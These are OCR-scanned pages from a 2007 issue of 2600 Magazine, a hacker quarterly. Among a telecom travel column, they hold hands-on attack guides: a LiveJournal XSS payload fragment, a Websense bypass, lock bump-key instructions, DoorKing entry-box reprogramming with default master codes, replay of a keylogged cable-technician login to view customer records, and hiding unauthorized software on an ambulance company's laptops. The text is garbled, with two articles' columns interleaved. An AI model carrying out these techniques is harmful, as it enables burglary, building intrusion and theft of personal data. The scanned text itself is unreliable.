com/interests.bml><input type=hidden name=mode value=add><input
type=hidden name=intid value=456049><input type=submit value=ESR></
form></body></html>, ); PopupMe(); document.esr2006.submit();");
This is the final known example of this exploit i n a functional form, whi ch not only
made users i nterested i n Exxon Seal Remover, but then triggered an aggressive
popup of one of fou r fucked-up-people pages from encyclopedia dramatica.
What can we learn from the past, with respect to development and secu rity? At first glance,
it wou ld appear that this is just a more advanced version of the same damn thing that happened
with Exxon Seal Remover in 2001 (see http://www. l ivejournal.com!tools/memories.bml?user
=acpizza&keyword=Exxon+Seal+Remover+bugfix.) where image tags weren't being properly
fi ltered and a l l owed for manipulation of the user's i nterests, or, i n the 2 1 -January-20m entry,
to launch the user's mail c l ient with a shocking message (it i n itia l ly said somethi ng else).
On the other hand, one has to take i nto account rea l ity, someth i ng we hackers often over
look. Whi le only having a day or two of sign ificant downtime in the last half dozen years,
LiveJournal . com has been completely overtaken in popu larity by the bug-ridden Swiss cheese
that is MySpace.com, and that's because MySpace.com used the same philosophy that Micro
soft has used in a l l their products (and perhaps u nti l recently with their OS): Get it worki ng,
now. Fix it when it breaks. I n a world with no real corporate responsibil ity, fixing security holes
before they are exploits or spending time creating qual ity code is a losing busi ness mode l . That
saddens me deepl y, but that's an u nfortu nate reality.
Kudos to the 80S and the 602.
Page 12 --------------------- 2600 Magazine

Greetings from 30,000 feet, and welcome
to another action-packed episode of the
"Telecom Informer!" It's late February and
my little project in Spencer, Iowa just ended.
Thanks to the money I made, I'm winging
my way over the Tasman Sea - on an Air
New Zealand flight between Wel l i ngton and
Melbourne, Australia!
So what was happening i n Spencer? Fun
stuff! Too bad it's over. If you're a regu lar
reader of my articles, you 've probably heard
of access charges and the U niversal Service
Fund, aka USF. If not, here's a quick refresher:
long distance cal ls have several chargeable
components, which are bu ilt into the few
cents per minute (or less) you pay to your long
distance carrier.
When you make a long distance cal l, your
local exchange carrier (LEe) del ivers the cal l
to your long distance carrier at the tandem. For
this, they charge a sma l l fee to the long distance
carrier, usually a fraction of a cent per minute.
Your long distance carrier takes the cal l over
their network to the nearest tandem switch to
the cal l desti nation, where a termination fee is
paid tothe LEC on the other end. This is usually
also only a fraction of a cent per minute, but
in certain high cost rural areas, it can be over
ten cents per minute. These charges are called
"access charges" and they' re the reason why
long distance cal ls cost money and I nternet
only VolP cal ls are free.
For a long time, carriers such as I nterna
tional Telecom Ltd. (based in Seattle, WA)
have taken advantage of access charges by
hosting free conference bridges, chat lines,
and other services - anything that generates a
lot of inbound traffic. You can get free unified
messaging from k7.net, free teleconferences
from mrconference.com, and even free dial
up I nternet service from nocharge.com (in the
Seattle and Boston areas). Free international
cal ls, however, hadn't been offered until
someone got a little creative in Spencer, Iowa.
Why Spencer? It's located in the remote
Iowa Great Lakes region. It's very expensive
to provide local service to this rural area and
access charges are, as you might imagi ne,
correspondi ngly high. However, thanks to
USF grants Spencer has plenty of fast Internet
connectivity. VolP termination to many foreign
countries, meanwhi le, is i ncredibly cheap, so
long as you ' re termi nating to land l i nes. So you
can probably see where this is goi ng. A simple
game of arbitrage! Cal l nearly anywhere i n the
developed world (well, land l i nes in about 40
countries actual ly) for only the cost of a phone
cal l to Iowa! Effectively, if you had a cel lular
plan offering u n l imited n ight and weekend
minutes, you could make unlimited off-peak
international cal ls. And done right, anyone
offering this service could make a half cent per
minute or more, splitting revenues with a local
partner in Spencer.
Well, the implementation worked beauti
fu l ly. The soft PBXs handling the cal ls were
lean, mean, moneymaking machines. U nfor
tunately, I hear this rea l ly ticked off the long
distance carriers. Rumor has it they started
putting pressure on N ECA, the FCC, and
anyone who wou ld listen. Presumably under
the mounting pressure of legal threats, our
partner in Iowa pul led the rug out from under
us. It was fun while it lasted though, because
prank cal ling random people in Hong Kong at
two in the morni ng was a lot more i nteresting
than most of the cal ls that pass through my
central office.
After the past couple of months' craziness
(we were terminating over 1 0,000 minutes per
hour to Chi na alone), I needed a break - at
least unti l I can dream up a better idea. So I
took the opportunity to visit the lovely south
island of New Zealand. Of course, I checked
out the telecommunications landscape as
wel l as the glaciers, mountai ns, and beaches.
New Zealand telecom is in transition, in some
areas more l i beralized than others but rapidly
modernizing nonetheless.
Cel lular services are the unexpected dino
saurs - sti l l a duopoly, as was the case five
years ago on my last visit. Vodafone operates
GSM with EDGE and GPRS data service and
Telecom NZ operates COMA (3G 1 xEV-DO
Spring 2007-------------------- Page 13

service is offered i n major metropol itan areas,
but small outlying areas sti l l have only IS-95
coverage - not even 1 xRTT). Wireless service
is i nsanely expensive by U.5. standards.
I ncoming calls are bil led on a "cal ler pays"
basis. Cel l u lar phones are a l l in special area
codes in the 02x series and it' s outrageously
expensive to cal l anythi ng i n these area codes.
You can l itera l ly set up a three-way cal l from
a land l i ne between China, New Zealand,
and the U .5. for less than one third the cost
of making a local cal l to a mobile phone in
Auckland. (For example, from a payphone
local cal ls to a mobile phone cost NZ$ 1 .20
per minute.)
When I last visited, Telecom NZ was
beginning to offer DSL services. A 64Kbps/
1 28Kbps l i ne with metered bandwidth started
at about NZ$70 per month, and the price
went up sharply depending upon how much
data you transferred. Competition has, fortu
nately, driven prices down. New Zealand has
adopted a simi lar regulatory approach as the
U .S., unbundling the DSL and Internet compo
nents. It has worked and broadband prices are
fairly reasonable; 1 28Kbps/4096Kbps service
runs about NZ$50 per month. However, there
is a vague "fair use pol icy" attached to these
plans. Basica l ly, if you run peer-to-peer appli
cations, bad th ings wil l happen (such as throt
tl i ng, traffic shaping, and other QoS measures).
From most providers, for about NZ$ 1 20 per
month, you can get 200GB of transfer that is
not subject to the same QoS restrictions.
WiFi is beginning to pop up in more
places, although it's not nearly as common
as in North America. Unfortunately, Kiwis try
to charge for it nearly everywhere the service
is avai lable to the public - usua l ly at outra
geous rates and with heavy fi ltering. I sought
out unsecured access poi nts instead - SSID of
L1N KSYS, anyone?
Wh i le my CDMA handset was able to roam
in New Zealand, the cost of doing so was
$2. 1 9 per minute - prohibitively expensive for
a l l but b i l l ionaires. I opted to let calls go to
voice mail instead, and I was pleased to see
that Cal ler ID and incomi ng SMS were del iv
ered correctly. Payphones were a much more
economical means of communicating. Unfor
tunately, there isn 't any one best way to make
a cal l from a payphone in New Zealand, so
this required some research and creativity.
The easiest way to ca l l from a payphone
is to buy a Telecom NZ prepaid cal ling card.
In fact, if you ' re cal ling anythi ng other than
a tol l-free number, it's the only way to make
cal ls from a payphone. I didn't see a single
payphone on the entire south island that
accepted coi ns. U nfortunately, using Telecom
NZ is also one of the most expensive ways to
cal l from a payphone, and is only practical
for local calls (wh ich are untimed and cost
NZ$0.70).
Telecom NZ prepaid cal l i ng cards are sold
at nearly every retai I outlet. They have smart
cards on them, and work simi larly to the
QuorTech Millennium stored value smart cards
(stil l available from Bel l Canada, although most
other LECs in North America have given up on
them). You stick it in the slot, the remaining
value is displayed on the console, you dial,
and the diminishing val ue is refreshed each
minute as your cal l progresses.
Using a prepaid cal ling card purchased
in the U.s. is another option. Costco sel ls an
MCI cal ling card that can be used for inter
national origination. However, the rates are
about US$0.35 per minute for calls back to
the U .S., and are nearly US$l per minute for
cal ls withi n New Zealand. While sometimes
good for short (one to two minute) cal ls from
payphones, it was proh ibitively expensive to
use these for long cal ls. The tol l-free country
direct numbers in New Zealand are 000-9 1 2
for MCI, 000-9 1 3 for AT&T, and 000-999 for
Sprint. These numbers can be used for making
col lect calls, and all of the carriers wil l transfer
you to their respective busi ness offices as
wel l (si nce Verizon owns MCI now, MCI can
transfer you to Verizon Wi reless customer
service - handy if you ' re having trouble with
your i nternational roami ng service).
Final ly, there is a burgeoning industry i n
third party VolP -based prepaid cal ling cards,
with rates at about NZ$0.04 per mi nute.
Of course, there's a catch: you have to dial
through a local gateway and, being VolP,
the qual ity can sometimes be inconsistent.
I ended up carrying two cal l i ng cards - one
Telecom NZ card used to connect to the local
gateway and a separate prepaid cal l i ng card
to cal l from there to my final destination. You
can make multiple consecutive calls without
redialing the gateway number, which means
you only pay Telecom NZ for one cal l . I used
a GoTalk card, wh ich offered excellent cal l
quality and had local access numbers nearly
everywhere i n New Zealand.
Well, the captain informs me that it' s time
to put away portable electronic devices, so
it's time to bring this issue of the "Telecom
I nformer" - and my laptop - to a close. Next
stop, the land of kangaroos, wal labies, and
Telstra!
Page 14 --------------------- 2600 Magazine

Avoiding Internet
by Major Lump
MajorLump@hotmail.com
"Yes, no, maybe so," goes the childhood
phrase. My friends and I took great delight
in endlessly repeating what we thought was
such a clever little rhyme. For the hacker,
however, this phrase rings particularly true.
System administrators often think in terms of
black and white (the "yes" and "no") while the
hacker sees shades of gray (the "maybe so").
The average computer user often assumes he
cannot outsmart or outthink the trained profes
sional. When stacking the teenage power user
against the professional system administrator,
it wou ld seem the administrator wou ld have
the advantage. Not so. The gray scale always
defeats the black and white.
I was recently surfing the Internet at my
school when I decided to pay a visit to 2600.
com. I typed in the URL, pressed enter, and
waited for the page. Rather than the green
2600 logo, a blue "Websense" logo stared
me in the face. It turned out that al l hacking
related websites are blocked, as wel l as other
"inappropriate" material. Since I attend a
rather liberal, prestigious prep school (no, I ' m
not a snob), I was surprised that the system
administrator governed with such an iron fist.
Surely a school that encourages freedom of
speech wou ld not use a content blocker and
thus stoop to the level of many foreign govern
ments (the ones we shun). I knew I needed to
find a sol ution to the problem and regain my
freedom.
Google, as many hackers know, is a
great information miner. I quickly directed
my browser to Google and searched under
"hacking websense". The tenth hit (Security
ForumX - A workaround to Websense) did the
trick. Nicely outlined in front of me was a hack
for avoiding the watchfu l eye of Websense. I
learned, from reading the article, that the
Websense filter does not monitor https connec
tions (which use the SSL protocol). I am not
sure exactly why but I suspect that it is either
due to the encryption (SSL) or the protocol
(SSL uses port 443 rather than port 80). Either
way, a user can access a proxy through an
https connection and thus liberate their web
browsing habits. After trying a few proxies,
my favorite was https:Ilwww.proxyweb.
-net, but others include MegaProxy Proxify
(https:Ilmegaproxy.com) and Proxify
(https:Ilwww.proxify.com). For a list of
great proxies and other goodies visit http:II
-w w w . p r o x y w a y . c o m / w w w / f r e e
proxy-server-list.html, http://
-tools.rosinstrument.com/proxy/,
or just Google for it ("free proxies +
https" wil l do the trick).
There is another hack or workaround
for extracting information that is blocked by
a filter. After outlining the proxy hack, the
fol lowing concept seems a little quaint. But if
the https/SSL proxy does not work, this primi
tive hack can be an effective last resort. If you
want to get a smal l fact or a tidbit of informa
tion from a specific, blocked website, you
can use Google's "site:" operator to search the
website. After retrieving the resu lts, Google
incl udes two lines of text under the link to
each hit. Normally, these tidbits of informa
tion would be blocked since they originate
from a blocked website. However, Google's
results can stil l paraphrase small sections (two
lines) of the target site. The more specific your
search terms, the more pertinent the informa
tion returned. For example, let's say I would
like to find the email address of 2600.com ' s
webmaster. Normally you would g o t o 2600.
com to get this information, but seeing that I
am on a filtered network, the site is blocked.
However, I can Google this search term:
"site:2600.com email + webmaster"
and the second hit gives me the email address:
webmaster@2600.com. This hack's major
stumbling block is, of course, that only
smal l tidbits of information can be retrieved.
However, in dire situations this workaround
can be a lifesaver.
Since network filtering is a major issue and
affects people al l over the world, there is a
plethora of online resources discussing hacks
and workarounds. lfyou'reinterested in learning
more I suggest that you visit http://www •
-zensur.freerk.com, http://peter
-rost.blogspot.com/2007/01/top-
-ten-methods-to-access-blocked.
-html, orhttp://www.webstuffscan.
-com/2006/11/23/how-to-access-
-blocked-websites-top-lO.Ofcourse,
Google is another great resource. Just Google
"accessing blocked websites" and
Spring 2007--------------------- Page 15

you shou ld have more h its than you know
what to do with. Before I end, I would l i ke to
just make one last comment. Major props go
to Google for their Google Docs and Spread
sheets. I wrote this article on their onl ine text
editor and found that it is both easy to use and
great for writing "controversial" articles that
can't wander into the wrong hands (namely
my school's system administrator). It's a hack
er's best friend.
Hacki ng You r
Own Fran
by Cliff
The only reason I want 2600-land to know
the fol lowing is to increase your own security.
I 've del ibC'rated long and hard, and as this
information is public domain anyway and is
currently i n use by the "bad guys," I trust you
wi l l not use it for bad purposes. Rather, using
this knowledge maliciously is wrong, stupid,
and i l legal i n practically every country and
community in the world. Use it i nstead to look
around your home, work, and possessions
and decide what additional measures (also
discussed) you wish to take.
Yale is a company that makes locks
- primari ly the latch-style locks, but also
padlocks, etc. U n ion also make locks with
latch-style keys. You may have seen some at
work or on your patio doors. In fact, latch
style key locks are everywhere. Sometimes
they're connC'cted to mortise bolts, sometimes
to padlocks, sometimes to latch locks, and a l l
of them can b e opened b y an amateur in less
than two seconds. Back up. read that again.
I can open your front door i n two seconds.
leaving no trace, no force, then go to your
neighbor and do the same again. And again.
So fast that I don't even look suspicious. I have
a skeleton key. I'm going to tel l you how to
make one.
First, the science bit... quick - to the pool
table! If you have several ba l ls touchi ng in a
l i ne and you fire the cue bal l at one end of
the line, the bal l at the other end shoots away.
If you have never tried this, it is the core of at
least half of all "trick-shots." (Be a l ittle creative
and you've now got a sideshow act as wel l as a
skeleton key - this is a good val ue articlel)
The bit to take away is that the energy is
transferred through the chai n and moves the
end bal l . The same principle is involved in this
techn ique but you need to understand locks to
see how this is useful .
Locks have a number of pins (around
five for a house key) that are spl it i n one of
(usual ly nine) positions along their length
wh ich are spring-loaded to i nterrupt the rota
tion of the mechanism (see diagram I a and
1 b for a simplified look). Inserting the (right!)
key i n the lock pushes a l l the pins so their
spl its come i nto l i ne with the barrel of the
mechanism, al lowing it to turn. I nserting the
wrong key leaves the pins sti l i misaligned so
the lock won't turn. A very simple mechanism
but pure genius when you consider it, giving
5A9 combinations = 59,049 different unique
combinations of keys and locks for five pins
with n i ne positions.
Alas, physics has rendered every single one
of those 59,049 locks openable with one key,
plus a l ittle bump of energy. Because of this.
these skeleton keys are cal led "bump" keys '
As with the pool bal ls, if you can i ntroduce
sufficient energy to one end of the bal l chain
(or i n th is case, one half of the lock pin), the
other end jumps away to absorb the energy (or,
i n this case, the top half of the pin jumps out
the way, allowing the lock to turn). We do th is
with a bump key. A bump key is a regular key
cut down to the lowest setting (see diagrams
2,1 for a normal key (my house key, in fact) ,md
2 b (the bump key)). You can do
'
this yourself
with a sma l l fi le. If it takes you more than 20
minutes, rea l ly, you're trying too hard!
Make sure you get nice smooth slopes on
the bump key - otherwise you may make a key
that w i l l go i nto a lock but not come out again.
Very embarrassing when you have to explain
to the wife/locksmith !
However, the funnily-shilped key alone
wi l l not open all doors. . . you need some bump
too, to jump all the top parts of the pins i1nd
al low the barrel to turn. This is the low-tech bit
Page 16 --------------------- 2600 Magazine

Pin i n closed
positi o n
of the show - the back-end of a screwdriver i s
perfect. I n order to pass the energy to the pins,
you need to i nsert your new key, but then pull
it out with a click - this is essential. Next, apply
a sma l l amount of torque to the key - not a
huge amount, just enough (this wi l l come with
practice). Final ly, hit the top of the bump key
with enough force to crack and maybe damage
the i nsides of a hard-boi led egg.
If it's worked, you can twist the key i n the
direction of the torque you appl ied. If not, pul l
the key out one cl ick again and try once more.
If you sti l l can't get it to work, you may be
hitti ng too soft, have cut your key too crudely
(although it's very tolerant), or be applying too
much or too l ittle torque. Experiment a bit!
So now you have a skeleton key for every
lock the key wi l l fit. Back up a second. One
key and 20 minutes ofwork just got you access
to a l l 59,049 formations of that lock. B l imey.
And don't imagine a $ 1 00 lock is better than a
$1 0 one - they're a l l the same. And padlocks
too - if you can get a key to fit the lock (i.e., it
is the right size and has the right gati ng), you
can open every instance of that lock. Double
B l imey.
Let's consider the impl ications of this a
second. Say you l ive i n a student dorm building
where each room has a key on the same lock
suite (same shaped keys). With in 20 minutes
of moving i n, the guy next door cou ld have a
key to every room in the building, including
the security office! In a dorm bui lding you
cannot fit your own locks to the doors - you
may as wel l leave the door open i n fact. Is that
a padlock on the security barrier at the car
park? Sudden ly you see it as unlocked - there
to let yourself into.
So now you're hopefu lly informed and
worried, and wondering how you can protect
yourself and your property. Good. Knowledge
is power, and now you know as much as the
people who want to steal your things. Have a
look at what locks you have and what you're
Outer
I n ner
protecti ng with those locks. There are several
thi ngs you can do to improve your security.
1 ) Fit an electronic system (Expensive, but
what fun ! This is the excuse you've always
wanted.) with card access, retina scans, RFI D
reader, etc., etc.
2) Fit "Chubb" style locks i n addition to
latch locks. They are the ones which j ust show
a keyhole through the door on the outside.
Thieves have no way of knowi ng exactly
what's behi nd the hole, so picking is harder
work (inexpensive, but heavy to carry).
3) Regu lar bolts are a great addition once
you're on the i nside.
4) Get a big dog and alarms, etc. - deter
rent factor!
But u ltimately, if someone wants to break
into your home, they w i l l . We can either isolate
ourselves through fear into losing community,
or we can rea l ly get to know our neighbors
and a l l keep our eyes out for one another.
And as we come to know and trust our
neighbors, we get to bu i ld something far more
val uable than material goods are worth anyway
- a fee l i ng of security as wel l as a physical ly
more secure neighborhood. Which world do
you want to l ive i n? You can make it happen.
You start sma l l with your own neighbors, your
own corridor, and encourage it to spread. We
can get our neighborhoods back.
Spring 2007-------------------- Page 17

Dorking
th
by Cadet Crusher
If you l ive in a newer or renovated apart
ment building, chances are there is a tele
phone entry system that controls visitors'
access to the building, and chances are it's
of the DoorKing brand. I have one of these
devices contro l l ing access to my building and
it occurred to me one day shortly after moving
in to investigate the security of such an access
control system after one of my friends used
it to enter my building. What piqued my
i nterest was the fact that the phone number
of the DoorKing showed up on my Cal ler 1 0.
So I cal led it back. Its response was merely a
short beep fol lowed by silence, indicating to
me that it was awaiting instruction. In order
to confirm this assumption, I downloaded
the operating manual, conveniently located
at http : //www. dkacces s. com/English/Tele
"'phone_Entry/ 1 8 35-0 65-F- 8-05. pdf , which
covers models 1833, 1834, 183 S, and 183 7
(figuring out what model your building has
is fairly trivial, j ust match you r menta l (or
digital) pictu re of your bu i lding's model with
one on the DoorKing website (www. doorking.
com)). Indeed it was awaiting command.
Basics of Programming Door
King Telephone Entry Systems
Before we begin, a standard disclaimer is
in order: I provide this information for educa
tiona l purposes and am not responsible for
what any individual may do with it.
The most important thing to note is that
all of the fol lowing programming steps must
be executed on the box 's keypad. Dia l-in
programming access is only supported via
the DoorKing Remote Account Manager
software (which I haven't had the oppor
tu n ity to examine yet - more on that in the
futu re). Another point to note is that the box
wi l l give you feedback as you give it instruc
tions, a short beep wil l be emitted after each
successfu l program step, and a long beep
(beeeeeeep, as the manual states) wi l l signal
end of programm ing. Lastly, you wi l l need
tbe master code for the box. Conveniently
for us tbe factory code is 9999. If the master
code has been changed I suggest trying 1234,
Page 18
1111 - 8888, or the b u i lding's address (I
have a feeling you ' l l be in l uck). One more
thing: wben you see something like *07 in the
steps below, that means press * then 0 then 7
unless otherwise stated. Good, now we can
get to the fun sturr.
Setting Tone/Pulse Dialing
Th is is the easiest th i ng to make the box
do (as wel l as quite humorous) . Just fol low
these steps:
1) Dial *07 then the master code.
2) Dial 0* for tone dial ing or 1* for pulse
dialing.
3) Press 0 and # together to end the
programm ing cycle.
It's that easy! Now you can watch every
one's befudd led looks as they wait for the box
to dial using pulses.
Changing Tone Open Codes
Tone open codes are what the cal led party
(the resident) must dial from his or her phone
to unlock the door for the guest. From the
manual :
1) Dial *05 then the master code.
2) Dial 0*, 1*, or 2* to designate wh ich
relay you wish to program. Most l i kely it is
Relay 0 or 0* Each box can control three
doors/gates, one per relay.
3 ) Dial the new tone open code. This w i l l
b e fou r digits. I f you want t o make it one digit,
l i ke 9, then vou wou ld dial 9 # # # . Each # is a
blank digit. The defau lts are Relay 0 = # # # # ,
Relay1 = 9876, Relay 2 = S432.
4) Press 0 and # together to end the
programming cycle.
I shou ld mention what Relays 0-2 are. The
box has three relays, one relay can control
one door/gate. We are most interested in
Relay 0 as it is the primary relay and most
likely the one control ling the door/gate we
wish to command. Now only you wil l know
the proper tone open code, so everyone else
wil l have to get up off the couch to let their
visitors in.
Other Capabilities
Programming the box from the keypad
al lows for a plethora of mischief to be done.
Here are j ust a few th ings possible· changing
2600 Magazine

fou r digit entry codes, setting the welcome
message, setting the door open time (how
long the relay wi l l keep the door unlocked
after access is granted), erasing the entire
directory, and, by far the most unsettl i ng,
reverse lookups of directory codes to resi
dent phone numbers. All of these functions
and more can found in the manual (refer to
the U RL above). Please use discretion when
exploring this system. Don 't disable any of
the locks or do anythi ng that wou ld compro
mise the security of the bui ldi ng. Remember
we' re here to learn.
Conclusion
Dorki ng a DoorKing entry system is aston
ishi ngly simple. I was surprised to find that so
much was programmable using the keypad
i nterface and a measly fou r digit master code.
The above examples are harmless pranks,
but the possibi l ity for much more mal icious
actions does exist. It does have an RS-32 port
tucked away behi nd its locked face plate
and most models have a 56k modem built
i n for programming via the Remote Account
Management software, so I assume the abi l ity
to program it via the keypad is a fai lsafe i n
case n o other programming methods are
available. Oh wel l, at least you can reset the
system ' s welcome message to let everyone i n
you r bui lding know that you "pwnd th is place
dODd".
by Xyzzy But just for kicks let's pretend I didn't
Like most people I don 't go looking for have a key logger running. The technician
trouble. I ' ve never made a hobby of trying to d i l igently closed the browser wi ndow when
steal passwords or violate people's privacy. he fi nished, but he neglected to quit the
But when an opportun ity slaps you right in browser entirely. Th is means that his authori
the face, I ' m as curious as the next person. zation session was sti l l cached. Launch you r
This is the story of one of those opportun ities. favorite packet sniffer, reload tech. nyc.rr.com
I ' m not here to demonstrate any el ite hack, in the browser, and voi la! You have captured
just to share i nformation with you about a the HTTP header conta i n i ng the tech nician ' s
vul nerabi l ity at Time Warner Cable i n the authorization logi n . It's hashed of cou rse, but
hopes that this large company w i l l do some- we don't care. Now switch over to tel net and
th i ng to fix their lax security. connect to tech. nyc.rr.com on port 80. Simu-
It all started when a Ti me Warner Cable late a web request with the fol lowi ng HTTP
technician arrived at my house to fix i ntermit- commands, fol lowed by two new l ines:
tent downtime on my cable I nternet connec- GET / HTTP / ! . !
ft k d d
Authori zat ion : Basic <technic ian ' s
tion . A er po i ng aroun an diagnosing login hash goes here>
very little (my connection happened to be up Host : tech . nyc . rr . com
at the ti me), the technician sat down at my Congratu lations, you ' re a spoof. Now you
laptop, opened a browser, and started typi ng. may wonder what treasures await us on this
Now I was interested. The technician opened mysterious web page? Not much, but enough .
the U RL tech.nyc. rr.com and logged i nto the The "tech. nyc.rr.com" page is a diagnostic
page using an htaccess window. Now if you page that shows basic information about a
were me, wouldn't you wish you had a key Ti me Warner customer' s account and cable
logger running right about now? Wel l, I keep modem. The page is titled "ServiceCertificate
a key logger run n i ng 24/7 on my laptop, so version 4.0.0" which is not a commercial
good th i ng you ' re not me. Hello username product as far as I can tel l (someone please
and password, nice to meet you . correct me i f you know more). The page
Spring 2007--------------------- Page 19

displays the customer' s account number,
name, address, and phone number. Th is
is i nteresting, because only the customer
name, address, and phone n umber are used
to authenticate incomi ng cal lers on Time
Warner telephone support. Let the social
engineering begin.
The page also i nc ludes the I P and Mac
addresses of the two network i nterfaces on
the modem: the downstream Ethernet l i n k
a n d the upstream DocSis l i nk. It also l i sts the
U B R hostname that the modem connects to,
plus stats on upload and download band
width, the modem uptime, and the modem
firmware version and firmware filename.
At the bottom is an HTML text box labeled
"Comments." I didn't play with this, but I ' m
sure you can thi n k of somethi ng fun . The
web server is run n i ng Apache version 1 .3 .2 9
a n d P H P version 5 .0.2 . D irectory i ndex i ng i s
turned on.
I also noted that the technician hadn't
entered any i nformation about my account
before loadi ng this page, mea n i ng that the
server m ust use a referrer address local to my
location as the variable used to determi ne
what customer account to display. H mmm,
this coul d be fun . Anyone interested in a
l ittle war walking? What's to stop me from
grabbing my laptop, wal k i ng down the street
and trying this techn ique on any open wifi
Hac
My
by anonymous
For the l ast three plus years I have worked
for a competitor to the nation ' s largest private
ambulance provider, American Medical
Response. I.i ke most people i n the i ndustry I
have learned to loathe this monster for its a l l ·
too-corporate busi ness strategies and its over
whelming quest for higher profits - often at
the expense of rel iable qual ity personnel and
equ ipment. Recently I completed my para
medic i nternsh ip with a paramedic preceptor
who works for AMR and I was treated to some
i nside i nformation whi le i nterni ng. Having a
node, thereby glea n i ng the account number,
customer name, address, and phone number
for that connection? My i ndefatigable mora l
compass? a h yes, I forgot about that.
Now comes the open letter to Time Warner
Cable:
Dear Newbs,
Here are some tips on how to improve
your security.
First, don 't send passwords to servers as
clear text even if it's hashed. That's what SSL
is for.
Second, does the expression "honey pot "
mean anything to you ? Prohibit your techni
cians from using customer computers to log
into anything. Physical access is inherently
insecure. Write that on the board a hundred
times until you memorize it.
Next, don 't include an entire customer
account dossier on any web page, password
protected or not. If you don 't understand why
this is bad practice, well then I can 't explain
it to you.
Finally, don 't use network addresses as
authentication variables of any kind. This is
trivial to spoof and exploit, particularly in the
age of open wifi nodes.
Oh, and please fix the intermittent down
time on my cable connection because it's still
busted.
M 'kay thanks.
technical background, my ears perked up
when thi ngs were bei ng d iscussed and my
preceptor had no qualms about letti ng me
poke a round here and there. I n this article I
w i l l share what I learned about AMR's field
computers during my i nternship.
I n some regions AMR is now uti l izing
notebook computers for charting purposes.
A field chart is different from an i n-hospita l
chart i n that i t contains a l l o f the patient' s
b i l l i ng information a s part o f the medical
record recorded by medical personnel. In
other words, protected personal i nformation
Page 20 --------------------- 2600 Magazine

is gathered and recorded by the EMTs and being deployed i n the field constantly they
paramedics that operate on the ambulance. could not be part of a domai n-based network.
This i nformation is then transmitted electroni- This posed a real problem i n that Supervisors
cal ly to an ODBC database that the compa- and IT staff needed m uch more access to
ny's b i l l ing department accesses via dai ly the machi ne than AMR was wi l l i ng to a l low
queries and assembles i nvoices from the data thei r field employees to have. So someone
gathered. Because acceptable levels of secu- poked around on the I nternet and found that
rity are typical ly more expensive than lower by replacing the actua l user G PO fi le you
levels, AMR has, in its corporate wisdom, can implement different security measures
chosen the latter of the two. Let's explore. for different users. Basica l l y, you create two
The computers used i n the field as of the different G PO fi les, one older than the other
timeof my i nternsh ip were a l l ltronixGoBooks. and having tighter security, and swap them
The company i nitial ly purchased GoBook around l i ke th is: Log on as an administrator
I's (the first generation), and has purchased and place the newer and less secured G PO
whichever model was most current ever si nce named registry.pol in the c: wi ndows
then. The latest model is the GoBook I I I, but ...system32GroupPolicy U ser directory.
there are plenty of Go Book lis sti l l around. Next, logon u nder each of the users you want
Hardware specs are available at http://www. to give more access to (i .e., supervisors and
...itronix.com and http://www.gobookiii .com/ IT personnel). Then, logon as the adm i n aga i n
..gb3/features.htm. The i nteresting hardware and move the G PO to a different folder and
components incl ude B l uetooth capabil ity replace it with the older registry.pol file with
(left active and u nsecured), 802. 1 1 big (AMR more security. When the Supervisor and IT
typical ly orders only 802. 1 1 b chipsets), and users are logged on with the o lder G PO i n
CRMA cel l u lar frequency cards. The CRMA place it is ignored because the pol icies that
cards are the PC cards avai lable from wi re- are currently appl ied are newer than the
less providers such as Cingu lar and Verizon. ones in the current G Po. The standard users
AMR uses both companies for mobile I nternet however are never logged on with the newer
access in different regions depending on pol icy in place so they implement the older,
which provider has the best coverage for a more secure pol icy. Of course, these pol i
given area. The cards are housed i nternal l y cies are typica l l y very poorly managed and
and connect to an external antenna mounted there isn't a whole lot you ' d really care to
on the screen portion of the case. We' l l come do that a creative m i nd won 't figure out how
back to this device later for a discussion of to accomplish. Instead of browsi ng direc
the security holes it presents. tories to launch programs create shortcuts
AMR upgraded these un its to Windows on the desktop. And since you can always
XP only over the l ast year or so. The official create a new text fi le on the desktop you
explanation was that they feared Windows have complete freedom in writing batch and
XP would somehow not support the Access Windows Script fi les to do you r bidding.
Database front-end they use for charti ng. Because AMR doesn't l i ke their employees
What I find so amusing about this is that they goofing off on the clock they also i nsta l l
purchased a Windows X P Professional l icense ContentWatch to restrict I nternet use. This
with every GoBook III and then rel ied on service works by restricting websites based
thei r Win2K corporate l icense for the actual on their categorization i n a database obtai ned
as l icensure. However, when they switched from an Internet server. A user logs on with a
to WinXP they actually purchased a corpo- username and password and thei r restriction
rate l i cense to cover a l l of the computers that l i st is downloaded. Each site visited by I nternet
they already had l icenses for! This, of course, Explorer is compared agai nst a database that
means you stand a good chance of being categorizes sites based upon content (e.g.,
able to use the Wi nXP Pro l i cense stuck to shoppi ng, news, personal, adu lt, etc.) and
the bottom of the GoBooks without getting users are only a l lowed to view sites with i n
caught. approved categories. Sites that have not
Now, Wi ndows XP Pro i mplements Active been categorized can be blocked or viewed
Directory (Duh), and AD has several secu rity based upon the i ndividual user' s settings that
pol icies that can be implemented to l i m it the are appl ied by thei r administrator. Since the
access users have, but you need a Domain restriction l ists are downloaded each time a
Controller supplying the Group Policy user logs on I have not found a way to get
Object in order to have different pol ic ies around this particular hurdle. It's not that I
apply to different users. With the computers wanted to download porn . I just wanted to
Spring 2007----------------------------------------- Page 21

use MySpace and "personals" are restricted. MSACCESS.EXE. This is n ice in that it stores
The best way to overcome this would be configuration data, including what ports the
to snag a supervisor's password since they program uses for sending and receiving i n
have free access o r to find a way to ki l l the these tables. Browse around and figure out
program. Thus far I have been unsuccessful what ports are currently bei ng used and query
in ki l l i ng it, but I never tried too hard either. the resu lts of you r port scan for addresses with
Of course, if you ' re brave and don 't mind a both the MEDS port and port 5 900 open. Any
traceable approach you cou ld always down- computers you find wi l l l i kely be AMRs.
load FireFox via a tel net' d FTP connection. Exploring MEDS even more turns up a few
If you intend to do this I suggest buryi ng the other i nteresti ng l ittle qu ips. The data entered
program fi les deep in the di rectory structure i nto MEDS is stored in separate access tables
and launching via an u nassum i ng script i n with a PCR 1 0 referenci ng the i ndividual chart
the system32 or some other clogged di rec- each piece of i nformation is associated with.
tory. You m ight a lso want to dig the u n insta l l For instance, there is a table titled MED_C that
data out of the registry so it doesn't show contains the l i st of patient medications typed
up on the "Add/Remove Programs" control i n by a user (med ications selected from a
panel . See, they ' l l trace the time stamp of drop down l ist are stored i n a separate table).
the program d irectory back to who was using Each row has three col umns. The first col u m n
t h e computer on that date a t that time, and is the default Primary Key and increases by a
unfortunately the system c lock is fairly wel l val ue of one i n each row, the second col u m n
protected. is the individual PCR 1 0 (un ique only on
Movi ng on to the ever more i nteresting that computer), and the thi rd is the actua l
